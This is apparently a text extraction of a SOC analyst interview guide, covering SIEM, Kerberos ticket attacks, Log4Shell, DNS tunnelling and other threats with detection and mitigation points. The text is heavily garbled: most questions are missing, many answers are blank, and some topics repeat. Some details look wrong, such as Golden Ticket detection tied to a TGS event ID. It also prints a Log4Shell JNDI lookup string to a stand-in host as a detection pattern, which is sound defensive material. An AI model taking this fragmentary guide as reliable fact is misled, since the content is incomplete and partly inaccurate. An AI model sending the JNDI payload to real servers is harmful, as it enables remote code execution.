Soc interview questions
Soc interview questions
Answer:
A Security Operations Center (SOC) is a centralized unit that monitors, detects, analyzes,
and responds to cybersecurity incidents in real time. Its primary functions include:
Answer:
SOC teams are typically structured into three levels:
L1 (Tier 1) - Security Analyst: Monitors alerts, performs initial analysis, and escalates
incidents.
L2 (Tier 2) - Incident Responder: Investigates security incidents, identifies threats, and
contains attacks.
L3 (Tier 3) - Threat Hunter/Forensic Analyst: Conducts deep threat analysis, digital
forensics, and proactive threat hunting.
Answer:
Security Information and Event Management (SIEM) tools collect, analyze, and correlate
security event logs from different sources to detect threats. Popular SIEM tools include:
Splunk
IBM QRadar
ELK Stack
ArcSight
Microsoft Sentinel
Answer:
Answer:
False Positive: A security alert that is triggered but is not an actual threat.
False Negative: A real threat that goes undetected.
For example:
Answer:
1. Identify the phishing email – Analyze the email headers, links, and attachments.
2. Isolate affected systems – If a user clicks a malicious link, disconnect the system.
3. Check logs in SIEM – Look for IOCs (Indicators of Compromise) related to phishing.
4. Block malicious domains/IPs – Add to firewall/IDS/IPS rules.
5. Educate the user – Provide security awareness training.
6. Report and Document – Maintain an incident response report for further analysis.
Malicious IP addresses
Suspicious domain names (e.g., phishing URLs)
Unusual file hashes (MD5, SHA-256)
Anomalous user behavior (e.g., failed login attempts)
Presence of malware signatures
Answer:
Threat Intelligence involves collecting, analyzing, and sharing information about cyber
threats to enhance security defenses. It helps in:
Answer:
Answer:
SOC Analysts use various tools for monitoring, detection, and response:
Answer:
Answer:
Answer:
Answer:
The MITRE ATT&CK Framework is a knowledge base of tactics, techniques, and procedures
(TTPs) used by adversaries. It helps SOC teams in:
Example Tactics:
Answer:
Zero Trust Security is a model that assumes no entity (internal or external) can be trusted
by default. It requires:
Answer:
A SOAR tool is used to automate security operations by integrating with SIEM, firewalls, and
threat intelligence platforms. It helps in:
Answer:
An APT is a long-term, stealthy attack by a well-funded adversary (often state-sponsored).
Characteristics include:
Example APT Groups: APT29 (Russia), APT41 (China), Lazarus Group (North Korea).
18. How would you detect and mitigate a DNS tunneling attack?
Answer:
Detection:
Mitigation:
Block suspicious domains.
Use firewalls to inspect DNS traffic.
Restrict external DNS resolution to trusted sources.
19. What is the difference between Tactics, Techniques, and Procedures (TTPs)?
Answer:
Answer:
Answer:
22. What are Honeytokens, and how are they used in security?
Answer:
Honeytokens are fake credentials, API keys, or database entries placed in a system to
detect unauthorized access. If they are used, it indicates a breach.
Examples:
Fake admin credentials in Active Directory.
Dummy AWS access keys to detect attackers scanning for cloud resources.
23. What is a Web Application Firewall (WAF), and how does it work?
Answer:
A WAF protects web applications from threats like:
SQL Injection
Cross-Site Scripting (XSS)
DDoS attacks
How it works:
Answer:
Keys Used Single secret key Public & private key pair
Answer:
A Pass-the-Hash (PtH) attack occurs when an attacker captures hashed credentials and
reuses them to authenticate without knowing the actual password.
Mitigation:
Answer:
Answer:
Monitor outbound network traffic – Large data transfers may indicate leaks.
Use DLP solutions (Data Loss Prevention) to block sensitive file movements.
Check endpoint logs for USB file transfers.
Identify unauthorized cloud uploads (Dropbox, Google Drive).
Answer:
A Golden Ticket attack is a Kerberos authentication exploit where an attacker creates a
forged ticket to gain persistent domain access.
Mitigation:
Answer:
LotL attacks use legitimate system tools (e.g., PowerShell, WMI, PsExec) to evade detection.
Examples:
Mitigation:
Detection:
Examples:
PowerShell-based attacks.
Exploiting Windows registry for persistence.
Answer:
Answer:
Answer:
Answer:
Answer:
EDR (Endpoint Detection & Response) → Focuses on endpoint threats. (e.g., CrowdStrike,
SentinelOne)
XDR (Extended Detection & Response) → Expands EDR to network, cloud, and email
security. (e.g., Palo Alto Cortex XDR)
MDR (Managed Detection & Response) → Outsourced SOC service that monitors security
24/7.
Answer:
Detection:
Use SIEM to monitor logs for ${jndi:ldap://malicious.com} patterns.
Inspect web server logs for unusual JNDI requests.
Prevention:
Patch Log4j to 2.17.1+.
Use WAF rules to block suspicious requests.
Answer:
Answer:
Answer:
A DCSync attack allows attackers to impersonate a Domain Controller and request
credentials from Active Directory.
Detection:
Prevention:
Answer:
Answer:
Windows Event ID 4625 logs failed logins.
Check for multiple failed attempts from a single IP → Possible brute force.
Look at the Logon Type (e.g., 3 = network, 10 = remote login).
Correlate with Event ID 4720 (new account creation).
43. What is an ELF binary, and how do you analyze it for malware?
Answer:
An ELF (Executable and Linkable Format) file is a binary used in Linux.
Malware Analysis:
Answer:
Answer:
Answer:
Answer:
A Golden SAML attack is an SSO attack where an attacker forges authentication tokens.
Mitigation:
Rotate SAML signing certificates.
Use multi-factor authentication (MFA).
Answer:
Answer:
Answer:
Answer:
A heap spray attack loads malicious code into memory and forces an application to execute
it.
Answer:
If Redis runs as root, attackers can write SSH keys for backdoor access.
Mitigation:
Bind Redis to localhost only.
Require password authentication.
Use firewalls to restrict access.
54. How do you investigate an NTFS alternate data stream (ADS) attack?
Answer:
Answer:
An Evil Twin attack creates a fake Wi-Fi hotspot to steal user credentials.
Mitigation:
Use VPNs on public Wi-Fi.
Avoid auto-connecting to open networks.
56. What is a DNS Tunneling attack, and how do you detect it?
Answer:
Answer:
Answer:
Process injection allows malware to run inside legitimate processes to avoid detection.
Common techniques:
DLL Injection (e.g., using CreateRemoteThread).
Code Hollowing (overwriting a process in memory).
Detection:
Use Sysmon Event ID 8 (CreateRemoteThread).
Monitor Windows Event ID 4688 (Process Creation).
Mitigation:
Enable LSA protection to prevent credential theft.
Answer:
Look for Event ID 4625 (failed logins) from the same IP.
Check for suspicious user agents in logs.
Correlate with Event ID 4776 (authentication failures).
Mitigation:
Enable Account Lockout Policy.
Implement RDP MFA and Network Level Authentication (NLA).
Answer:
Answer:
Attackers forge TGS (Ticket Granting Service) tickets for lateral movement.
Detection:
Look for Event ID 4769 (TGS requests) with unusual activity.
Check for service access from unexpected accounts.
Mitigation:
Rotate service account passwords regularly.
Implement LSA Protection and Protected Users Group.
Answer:
BPFdoor is a Linux backdoor that uses Berkeley Packet Filter (BPF) for stealth.
Detection:
Monitor for abnormal open ports with lsof -i.
Check for hidden processes using ps aux | grep bpfd.
Look for network traffic anomalies.
Mitigation:
Use EDR solutions for Linux (Falco, Wazuh).
Restrict root access and disable unused services.
Answer:
64. What is Living Off the Land (LotL) attack, and how do you detect it?
Answer:
65. How does an attacker use Cobalt Strike, and how do you detect it?
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Attackers extract Kerberos TGS (service tickets) and brute-force them offline.
Detection:
Look for Event ID 4769 (TGS Request) with RC4 encryption.
Monitor for large numbers of TGS requests from a single user.
Mitigation:
Enforce AES encryption for Kerberos tickets.
Use strong, randomly generated passwords for service accounts.
Answer:
Attackers create a forged TGT (Ticket Granting Ticket) with unlimited access.
Detection:
Event ID 4769 with unusual TGT lifetimes.
Look for accounts granting access to multiple unrelated systems.
Monitor for high-privilege account logins at odd hours.
Mitigation:
Regularly reset krbtgt account passwords.
Enable SID Filtering and Protected Users Group.
74. What is a Pass-the-Ticket (PtT) attack, and how do you detect it?
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
Answer:
85. What is an Evil Twin attack, and how do you detect it?
Answer:
An Evil Twin is a rogue Wi-Fi access point that mimics a legitimate network.
Detection:
Use Wireshark to identify APs with identical SSIDs.
Monitor for multiple MAC addresses broadcasting the same network name.
Mitigation:
Enable WPA3 authentication.
Use VPN on public Wi-Fi.
86. What is a Silver Ticket attack, and how do you detect it?
Answer:
Attackers forge a TGS (Service Ticket) for a specific service without interacting with the
DC.
Detection:
Monitor Event ID 4769 (TGS Request) with RC4 encryption.
Look for logins bypassing Kerberos TGT validation.
Mitigation:
Use AES-only authentication.
Rotate service account passwords regularly.
Answer:
Answer:
Answer:
Answer:
Answer:
Attackers steal phone numbers to bypass 2FA.
Detection:
Look for sudden changes in 2FA delivery methods.
Monitor for multiple failed 2FA login attempts.
Mitigation:
Use hardware-based authentication (YubiKey, FIDO2).
Enable carrier PINs for SIM protection.
Answer:
Magecart is a web skimming attack that steals credit card details from checkout pages.
Detection:
Monitor for unauthorized JavaScript changes in e-commerce sites.
Look for unusual external domains in network requests.
Mitigation:
Implement Subresource Integrity (SRI) for JavaScript.
Regularly scan for unauthorized script injections.
94. What is a Living-Off-the-Land (LotL) attack, and how do you detect it?
Answer:
Answer:
Answer:
Answer:
Answer:
99. What is an NTLM Relay Attack, and how do you prevent it?
Answer:
Answer:
Answer:
102. What is a Golden SAML attack, and how do you detect it?
Answer:
Answer:
Attackers use legitimate CDNs (Cloudflare, Akamai, AWS) to hide malicious traffic.
Detection:
Look for mismatches between HTTP Host headers and TLS SNI fields.
Monitor anomalous domain requests within encrypted traffic.
Mitigation:
Block unused CDNs at firewall level.
Use DPI (Deep Packet Inspection) to analyze SNI fields.
Answer:
Answer:
106. What is a Golden Ticket attack, and how do you detect it?
Answer:
Attackers forge a Kerberos TGT (Ticket Granting Ticket) with Domain Admin rights.
Detection:
Monitor for Event ID 4769 (TGS requests with unusual lifetimes).
Detect logins using non-expiring Kerberos tickets.
Mitigation:
Rotate krbtgt account password twice.
Implement Managed Service Accounts (MSAs) instead of regular accounts.
Answer:
Answer:
Answer:
Answer:
111. What is an HTML Smuggling attack, and how do you detect it?
Answer:
Attackers deliver malicious payloads via encoded JavaScript inside HTML files.
Detection:
Look for downloads of .html files containing atob() or Blob() functions.
Monitor for encoded JavaScript constructing binary payloads.
Mitigation:
Block HTML attachments in emails.
Use browser security policies (Content Security Policy - CSP).
112. What is a Container Escape attack, and how do you detect it?
Answer:
Attackers break out of Docker or Kubernetes containers to access the host system.
Detection:
Monitor for containerized processes accessing host namespaces (/proc/self/ns/mnt).
Look for privileged container executions (--privileged flag).
Mitigation:
Use seccomp and AppArmor policies.
Implement runtime security tools like Falco or Aqua Security.
Answer:
Answer:
Answer:
Answer:
Attackers spam the victim with continuous MFA push notifications until they approve
one.
Detection:
Look for multiple failed MFA requests within a short time.
Monitor MFA approvals from unusual locations or times.
Mitigation:
Implement MFA number matching to prevent accidental approvals.
Use phishing-resistant authentication like FIDO2 tokens.
Answer:
Answer:
Attackers use PowerShell for lateral movement, privilege escalation, and payload
execution.
Detection:
Monitor PowerShell execution with -EncodedCommand parameter.
Look for suspicious child processes (powershell.exe spawning cmd.exe).
Mitigation:
Enable PowerShell Constrained Language Mode.
Use Windows Defender AMSI (Antimalware Scan Interface) to detect malicious
scripts.
Answer:
Steps:
1. Use Volatility or Rekall for memory analysis.
2. Extract suspicious processes using pslist or pstree.
3. Look for network connections using netscan.
4. Dump malicious process memory with procdump.
5. Analyze extracted malware using VirusTotal or sandboxing.
Attackers exploit browsers to bypass same-origin policy and hijack internal networks.
Detection:
Look for rapid DNS resolution changes in a short time.
Monitor JavaScript making requests to private IP ranges.
Mitigation:
Block external DNS responses resolving to RFC 1918 private IPs.
Use browser security settings (e.g., Content Security Policy - CSP).
Answer:
Answer:
Answer:
Detection:
Look for CloudTrail logs showing PutObjectAcl or ListBuckets operations from
unknown IPs.
Monitor public S3 bucket access changes.
Mitigation:
Enforce S3 Bucket Policies to deny public access.
Enable AWS Macie for data classification and anomaly detection.
Answer:
Attackers relay captured NTLM authentication to access SMB or LDAP.
Detection:
Look for SMB authentication attempts from unauthorized hosts.
Monitor for Event ID 4624 (Type 3 logins with NTLM authentication).
Mitigation:
Enforce SMB signing and Extended Protection for Authentication (EPA).
Block NTLM authentication over LDAP.
125. What is BEC (Business Email Compromise), and how do you detect it?
Answer:
Answer:
Attackers use malicious USB devices that act as keyboards or network adapters.
Detection:
Look for new HID devices registered as keyboards (Event ID 6416).
Detect sudden script execution immediately after USB insertion.
Mitigation:
Disable USB autorun policies.
Use USB whitelisting and endpoint protection.
Answer:
Detection:
Look for Azure Sign-in logs showing multiple failed attempts from different locations.
Monitor suspicious logins bypassing MFA.
Mitigation:
Implement Conditional Access Policies.
Use Azure Identity Protection to detect risky sign-ins.
128. What is a Kubernetes RBAC attack, and how do you detect it?
Answer:
Attackers exploit weak Kubernetes Role-Based Access Control (RBAC) configurations.
Detection:
Look for Service Account tokens being used from unexpected IPs.
Monitor for privilege escalation attempts using kubectl auth can-i.
Mitigation:
Follow least privilege principle for Kubernetes RBAC policies.
Regularly audit Kubernetes RoleBindings and ClusterRoles.
Answer:
Answer:
Detection:
Look for Google Admin log events showing password resets or MFA changes.
Monitor OAuth token grants to unknown third-party apps.
Mitigation:
Enforce OAuth app whitelisting.
Require hardware-based MFA (Titan Security Keys).